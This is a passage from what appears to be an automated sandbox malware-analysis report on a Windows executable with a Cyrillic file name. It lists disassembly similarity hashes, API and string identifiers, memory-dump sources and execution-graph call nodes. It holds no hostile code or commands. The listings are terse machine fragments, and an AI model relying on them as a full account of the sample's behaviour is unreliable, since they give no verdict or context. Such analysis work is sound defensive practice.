                                                                                                                                                                                                                                                        • API ID: Window$Show$Rect
                                                                                                                                                                                                                                                        • String ID: RarHtmlClassName
                                                                                                                                                                                                                                                        • API String ID: 2396740005-1658105358
                                                                                                                                                                                                                                                        • Opcode ID: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                        • Instruction ID: 4b4c082ebe517145652d9bad60c94bb73a8d474ebfc09338bd85998e5fc5efbb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1251A736A0878286EB28DB25F44437AA760FF95B84F246035DE4E87B54DF3EE4058B50
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                                                                        • API String ID: 0-56093855
                                                                                                                                                                                                                                                        • Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                        • Instruction ID: 120a5a482e5076e0e4609f263d87ede7ed6ca85e220e8ff83195ca0782048381
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F121E731A0CB4780FF188B19F84417463A1AB45B88F34613AC98DC73A4EE7EE9959790
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                        • Instruction ID: 281d35174e0e7b459ea8e375e7eae8f43e06ee20df4935505c6b600aaded469a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F0FF21A19A4681EF588B15F8942796360EF88B94F687039EA4F86664DE3DD484C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2398171386-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3659116390-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 190572456-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3621893840-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
Similarity
• API ID: __except_validate_context_recordabort
• String ID: csm$csm
• API String ID: 746414643-3733052814
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: $*
• API String ID: 3215553584-3982473090
Similarity
• API ID: CreateFrameInfo__except_validate_context_recordabort
• String ID: csm
• API String ID: 2466640111-1018135373
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
Similarity
• API ID: ObjectRelease
• String ID:
• API String ID: 1429681911-3916222277
Similarity
• API ID: CapsDeviceRelease
• String ID:
• API String ID: 127614599-3916222277
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2025052027-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1077098981-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4141327611-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B4021
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B4083
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B40BD
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6063AF93B), ref: 00007FF6063B40E7
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1557788787-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF6063AB380,?,?,00000050,00007FF6063AD3C1), ref: 00007FF6063B095A
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6063AB380,?,?,00000050,00007FF6063AD3C1), ref: 00007FF6063B09C2
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF6063AB380,?,?,00000050,00007FF6063AD3C1), ref: 00007FF6063B09D8
                                                                                                                                                                                                                                                        • abort.LIBCMT ref: 00007FF6063B09DE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
• Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1447195878-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                                                                                                                                                        • String ID: SIZE
                                                                                                                                                                                                                                                        • API String ID: 449872665-3243624926
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        • C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, xrefs: 00007FF6063AF7D9
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                        • API String ID: 3307058713-2271546086
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                                                                                                                                        • String ID: $%s$@%s
                                                                                                                                                                                                                                                        • API String ID: 2650857296-834177443
                                                                                                                                                                                                                                                        • Opcode ID: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                                                                                                        • Instruction ID: cc8dced10d3122e730837849178378fa32fff343bc714f3ad75d3b0bf303658c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5031A572B18B4689EA188F69E4407F963A0FF44784F607032EE0D97BA5DE7EE505C780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                        • Opcode ID: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                                                                                                        • Instruction ID: 15241c248c316b318f96047877dc9a7054da73d873289e933ecd49f424d8d835
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3721A922E08F4381EB688B2595A017A6651EB49774F353335D7AF477D4CE3ED981D380
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6063A57EE), ref: 00007FF6063A788C
                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6063A57EE), ref: 00007FF6063A78D2
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                                                                                                        • Instruction ID: d6f4c2346f02747d6b24e97156a5d0a41a3da7b325e8db055070f10f5a19c611
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97115E36A18B8582EB288F15F480269B7B5FB88B88F685230EF8D47758DF3DD551CB40
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                                                                                                                                                        • String ID: RTL
                                                                                                                                                                                                                                                        • API String ID: 3537982541-834975271
                                                                                                                                                                                                                                                        • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                                                                                                        • Instruction ID: 71e63b0056ec7337ce8ba6d8a7d566ca771235cbca1515f96e24e2b473a19f08
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9D01791F09B4682FF1D4B62A84837456505B18B41F683038CA1E86390EE6ED0888794

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:9.4%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                        Total number of Limit Nodes:34
19687->20026 19690->19544 19690->19545 19693 7ff6d9266ff9 19692->19693 19697 7ff6d9267026 19692->19697 19694 7ff6d9266ffe 19693->19694 19693->19697 19695 7ff6d9254f08 _get_daylight 11 API calls 19694->19695 19698 7ff6d9267003 19695->19698 19696 7ff6d926706a 19699 7ff6d9254f08 _get_daylight 11 API calls 19696->19699 19697->19696 19700 7ff6d9267089 19697->19700 19714 7ff6d926705e __crtLCMapStringW 19697->19714 19701 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19698->19701 19702 7ff6d926706f 19699->19702 19703 7ff6d9267093 19700->19703 19704 7ff6d92670a5 19700->19704 19705 7ff6d926700e 19701->19705 19706 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19702->19706 19707 7ff6d9254f08 _get_daylight 11 API calls 19703->19707 19708 7ff6d9254f4c 45 API calls 19704->19708 19705->19534 19706->19714 19709 7ff6d9267098 19707->19709 19710 7ff6d92670b2 19708->19710 19711 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19709->19711 19710->19714 20073 7ff6d9268b08 19710->20073 19711->19714 19714->19534 19715 7ff6d9254f08 _get_daylight 11 API calls 19715->19714 19717 7ff6d92591b1 19716->19717 19718 7ff6d92591ad 19716->19718 19739 7ff6d92625f0 19717->19739 19718->19606 19731 7ff6d92594ec 19718->19731 19723 7ff6d92591c3 19725 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19723->19725 19724 7ff6d92591cf 19765 7ff6d925927c 19724->19765 19725->19718 19728 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19729 7ff6d92591f6 19728->19729 19730 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19729->19730 19730->19718 19732 7ff6d9259515 19731->19732 19733 7ff6d925952e 19731->19733 19732->19606 19733->19732 19734 7ff6d925eb98 _get_daylight 11 API calls 19733->19734 19735 7ff6d92607e8 WideCharToMultiByte 19733->19735 19736 7ff6d92595be 19733->19736 19738 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19733->19738 19734->19733 19735->19733 19737 7ff6d925a948 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19736->19737 19737->19732 19738->19733 19740 7ff6d92625fd 19739->19740 19741 7ff6d92591b6 19739->19741 19784 7ff6d925b224 19740->19784 19745 7ff6d926292c GetEnvironmentStringsW 19741->19745 19746 7ff6d926295c 19745->19746 19747 7ff6d92591bb 19745->19747 19748 7ff6d92607e8 WideCharToMultiByte 19746->19748 19747->19723 19747->19724 19749 7ff6d92629ad 19748->19749 19750 7ff6d92629b4 FreeEnvironmentStringsW 19749->19750 19751 7ff6d925d5fc _fread_nolock 12 API calls 19749->19751 19750->19747 19752 7ff6d92629c7 19751->19752 19753 7ff6d92629d8 19752->19753 19754 7ff6d92629cf 19752->19754 19756 7ff6d92607e8 WideCharToMultiByte 19753->19756 19755 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19754->19755 19757 7ff6d92629d6 19755->19757 19758 7ff6d92629fb 19756->19758 19757->19750 19759 7ff6d9262a09 19758->19759 19760 7ff6d92629ff 19758->19760 19762 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19759->19762 19761 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19760->19761 19763 7ff6d9262a07 FreeEnvironmentStringsW 19761->19763 19762->19763 19763->19747 19766 7ff6d92592a1 19765->19766 19767 7ff6d925eb98 _get_daylight 11 API calls 19766->19767 19779 7ff6d92592d7 19767->19779 19768 7ff6d92592df 19769 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19768->19769 19770 7ff6d92591d7 19769->19770 19770->19728 19771 7ff6d9259352 19772 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19771->19772 19772->19770 19773 7ff6d925eb98 _get_daylight 11 API calls 19773->19779 19774 7ff6d9259341 19776 7ff6d92594a8 11 API calls 19774->19776 19775 7ff6d925a4a4 __std_exception_copy 37 API calls 19775->19779 19777 7ff6d9259349 19776->19777 19780 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19777->19780 19778 7ff6d9259377 19781 7ff6d925a900 _isindst 17 API calls 
19778->19781 19779->19768 19779->19771 19779->19773 19779->19774 19779->19775 19779->19778 19782 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19779->19782 19780->19768 19783 7ff6d925938a 19781->19783 19782->19779 19785 7ff6d925b235 FlsGetValue 19784->19785 19786 7ff6d925b250 FlsSetValue 19784->19786 19788 7ff6d925b242 19785->19788 19789 7ff6d925b24a 19785->19789 19787 7ff6d925b25d 19786->19787 19786->19788 19791 7ff6d925eb98 _get_daylight 11 API calls 19787->19791 19790 7ff6d925a504 __CxxCallCatchBlock 45 API calls 19788->19790 19792 7ff6d925b248 19788->19792 19789->19786 19793 7ff6d925b2c5 19790->19793 19794 7ff6d925b26c 19791->19794 19804 7ff6d92622c4 19792->19804 19795 7ff6d925b28a FlsSetValue 19794->19795 19796 7ff6d925b27a FlsSetValue 19794->19796 19798 7ff6d925b296 FlsSetValue 19795->19798 19799 7ff6d925b2a8 19795->19799 19797 7ff6d925b283 19796->19797 19800 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19797->19800 19798->19797 19801 7ff6d925aef4 _get_daylight 11 API calls 19799->19801 19800->19788 19802 7ff6d925b2b0 19801->19802 19803 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19802->19803 19803->19792 19827 7ff6d9262534 19804->19827 19806 7ff6d92622f9 19842 7ff6d9261fc4 19806->19842 19809 7ff6d925d5fc _fread_nolock 12 API calls 19810 7ff6d9262327 19809->19810 19811 7ff6d926232f 19810->19811 19813 7ff6d926233e 19810->19813 19812 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19811->19812 19826 7ff6d9262316 19812->19826 19813->19813 19849 7ff6d926266c 19813->19849 19816 7ff6d926243a 19818 7ff6d9254f08 _get_daylight 11 API calls 19816->19818 19817 7ff6d9262454 19821 7ff6d9262495 19817->19821 19823 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19817->19823 19819 7ff6d926243f 19818->19819 19822 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19819->19822 19820 7ff6d92624fc 19825 
7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19820->19825 19821->19820 19860 7ff6d9261df4 19821->19860 19822->19826 19823->19821 19825->19826 19826->19741 19828 7ff6d9262557 19827->19828 19829 7ff6d9262561 19828->19829 19875 7ff6d92602d8 EnterCriticalSection 19828->19875 19832 7ff6d92625d3 19829->19832 19834 7ff6d925a504 __CxxCallCatchBlock 45 API calls 19829->19834 19832->19806 19836 7ff6d92625eb 19834->19836 19838 7ff6d925b224 50 API calls 19836->19838 19841 7ff6d9262642 19836->19841 19839 7ff6d926262c 19838->19839 19840 7ff6d92622c4 65 API calls 19839->19840 19840->19841 19841->19806 19843 7ff6d9254f4c 45 API calls 19842->19843 19844 7ff6d9261fd8 19843->19844 19845 7ff6d9261ff6 19844->19845 19846 7ff6d9261fe4 GetOEMCP 19844->19846 19847 7ff6d926200b 19845->19847 19848 7ff6d9261ffb GetACP 19845->19848 19846->19847 19847->19809 19847->19826 19848->19847 19850 7ff6d9261fc4 47 API calls 19849->19850 19851 7ff6d9262699 19850->19851 19852 7ff6d92627ef 19851->19852 19854 7ff6d92626d6 IsValidCodePage 19851->19854 19859 7ff6d92626f0 __scrt_get_show_window_mode 19851->19859 19853 7ff6d924c550 _log10_special 8 API calls 19852->19853 19855 7ff6d9262431 19853->19855 19854->19852 19856 7ff6d92626e7 19854->19856 19855->19816 19855->19817 19857 7ff6d9262716 GetCPInfo 19856->19857 19856->19859 19857->19852 19857->19859 19859->19859 19876 7ff6d92620dc 19859->19876 19932 7ff6d92602d8 EnterCriticalSection 19860->19932 19877 7ff6d9262119 GetCPInfo 19876->19877 19878 7ff6d926220f 19876->19878 19877->19878 19880 7ff6d926212c 19877->19880 19879 7ff6d924c550 _log10_special 8 API calls 19878->19879 19881 7ff6d92622ae 19879->19881 19882 7ff6d9262e40 48 API calls 19880->19882 19881->19852 19883 7ff6d92621a3 19882->19883 19887 7ff6d9267b84 19883->19887 19886 7ff6d9267b84 54 API calls 19886->19878 19888 7ff6d9254f4c 45 API calls 19887->19888 19889 7ff6d9267ba9 19888->19889 19892 7ff6d9267850 19889->19892 19893 7ff6d9267891 19892->19893 19894 7ff6d925f8a0 
